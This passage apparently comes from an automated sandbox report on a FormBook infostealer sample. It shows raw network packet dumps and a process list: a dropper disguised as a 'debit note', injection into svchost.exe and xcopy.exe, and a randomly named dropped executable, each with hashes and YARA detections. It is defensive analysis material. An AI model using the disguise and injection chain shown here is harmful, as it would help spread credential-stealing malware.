Nov 4, 2024 10:14:03.718085051 CET	1236	IN	Data Raw: 42 14 ac 84 4c 44 b1 88 8e f3 16 5b 22 a1 14 e8 ca 0a 0d 35 2b b8 80 96 90 42 fb e2 61 49 42 91 36 bb 74 6a 08 10 df a8 73 f1 5f 23 4f f5 d7 fa d8 19 cc 97 8c 3b fd bd e3 19 46 5e 48 6b dd 0d 0a 62 34 30 0d 0a f2 a5 14 a6 1f d8 cf ec c7 f6 63 d3 Data Ascii: BLD["5+BaIB6tjs_#O;F^Hkb40c7{$\|#gQw1~=2RrP>0H04i"SN #,H1]\a.!K$2"7km47mXn/1gvh3v(>6tr-~vpLb59
Nov 4, 2024 10:14:03.718868017 CET	1236	IN	Data Raw: 69 60 0e ec 86 fd f4 84 43 68 92 40 35 5e 9e 57 ae f9 62 74 bc 0f b2 79 9e 01 0d 91 c8 44 c2 dd 29 8d 93 92 f8 f0 5a 49 e0 54 9c 4d 92 ce 98 9a e0 b8 33 0b 28 98 bb 0e a5 1f 48 cb e6 90 36 45 00 78 b7 d6 00 d0 08 dc e5 47 87 9f 1f c7 70 8f 29 2e Data Ascii: i`Ch@5^WbtyD)ZITM3(H6ExGp).0})`%o'vse\>CBG ]_K^Kwq9HEC$:jXyIlGR( )Q1g1g%m<dw\_/>>]Ff'&u38N/~I;+7?Q
Nov 4, 2024 10:14:03.718880892 CET	485	IN	Data Raw: fa 82 e2 0b a2 1d 11 50 18 c9 2b 88 a4 3c 2f 73 08 89 d4 42 c5 61 de 6c ba e9 05 0e ea 9d ab df c8 4d 6d 94 f5 17 58 26 b5 83 aa 79 1c f8 75 27 7d 1f 20 e8 3b 2b c0 3e 41 97 3e 3a 6d 46 ee 84 6d 37 16 aa a3 be 7d 6c 1f 62 da cf 98 3a c7 19 07 6e Data Ascii: P+</sBalMmX&yu'} ;+>A>:mFm7}lb:nHo?twIhz?PO3}&V4~U_`@B40:16Eyc#Wz!Osd bH]O\|Q1X;Txk^$*d%y$:1g!(

Target ID:	0
Start time:	04:09:53
Start date:	04/11/2024
Path:	C:\Users\user\Desktop\debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe"
Imagebase:	0x800000
File size:	1'627'136 bytes
MD5 hash:	A60AE01B598FD87CBC1ED78936DED2E6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Target ID:	1
Start time:	04:10:09
Start date:	04/11/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe"
Imagebase:	0xe80000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2058426650.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2058640139.0000000002FB0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2059058691.0000000004D50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Target ID:	5
Start time:	04:10:28
Start date:	04/11/2024
Path:	C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe"
Imagebase:	0xcd0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4096792766.0000000003740000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Target ID:	6
Start time:	04:10:30
Start date:	04/11/2024
Path:	C:\Windows\SysWOW64\xcopy.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\xcopy.exe"
Imagebase:	0xbc0000
File size:	43'520 bytes
MD5 hash:	7E9B7CE496D09F70C072930940F9F02C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4097004785.0000000003200000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4095195033.0000000000A20000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4097236613.0000000003250000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Target ID:	7
Start time:	04:10:44
Start date:	04/11/2024
Path:	C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe"
Imagebase:	0xcd0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4099556675.0000000005630000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Target ID:	8
Start time:	04:10:56
Start date:	04/11/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff6bf500000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true